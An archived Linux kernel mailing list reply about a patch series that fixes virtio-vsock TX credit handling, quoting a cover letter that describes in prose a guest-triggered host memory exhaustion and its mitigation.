lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <xwnhhms5divyalikrekxxfkz7xaeqwuyfzvro72v5b4davo6hc@kii7js242jbc>
Date: Thu, 18 Dec 2025 10:18:03 +0100
From: Stefano Garzarella <sgarzare@...hat.com>
To: Melbin K Mathew <mlbnkm1@...il.com>
Cc: stefanha@...hat.com, kvm@...r.kernel.org, netdev@...r.kernel.org, 
	virtualization@...ts.linux.dev, linux-kernel@...r.kernel.org, mst@...hat.com, 
	jasowang@...hat.com, xuanzhuo@...ux.alibaba.com, eperezma@...hat.com, 
	davem@...emloft.net, edumazet@...gle.com, kuba@...nel.org, pabeni@...hat.com, 
	horms@...nel.org
Subject: Re: [PATCH net v4 0/4] vsock/virtio: fix TX credit handling

On Wed, Dec 17, 2025 at 07:12:02PM +0100, Melbin K Mathew wrote:
>This series fixes TX credit handling in virtio-vsock:
>
>Patch 1: Fix potential underflow in get_credit() using s64 arithmetic
>Patch 2: Cap TX credit to local buffer size (security hardening)
>Patch 3: Fix vsock_test seqpacket bounds test
>Patch 4: Add stream TX credit bounds regression test

Again, this series doesn't apply both on my local env but also on 
patchwork:
https://patchwork.kernel.org/project/netdevbpf/list/?series=1034314

Please, can you fix your env?

Let me know if you need any help.

Stefano

>
>The core issue is that a malicious guest can advertise a huge buffer
>size via SO_VM_SOCKETS_BUFFER_SIZE, causing the host to allocate
>excessive sk_buff memory when sending data to that guest.
>
>On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with
>32 guest vsock connections advertising 2 GiB each and reading slowly
>drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only
>recovered after killing the QEMU process.
>
>With this series applied, the same PoC shows only ~35 MiB increase in
>Slab/SUnreclaim, no host OOM, and the guest remains responsive.
>-- 
>2.34.1
>


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ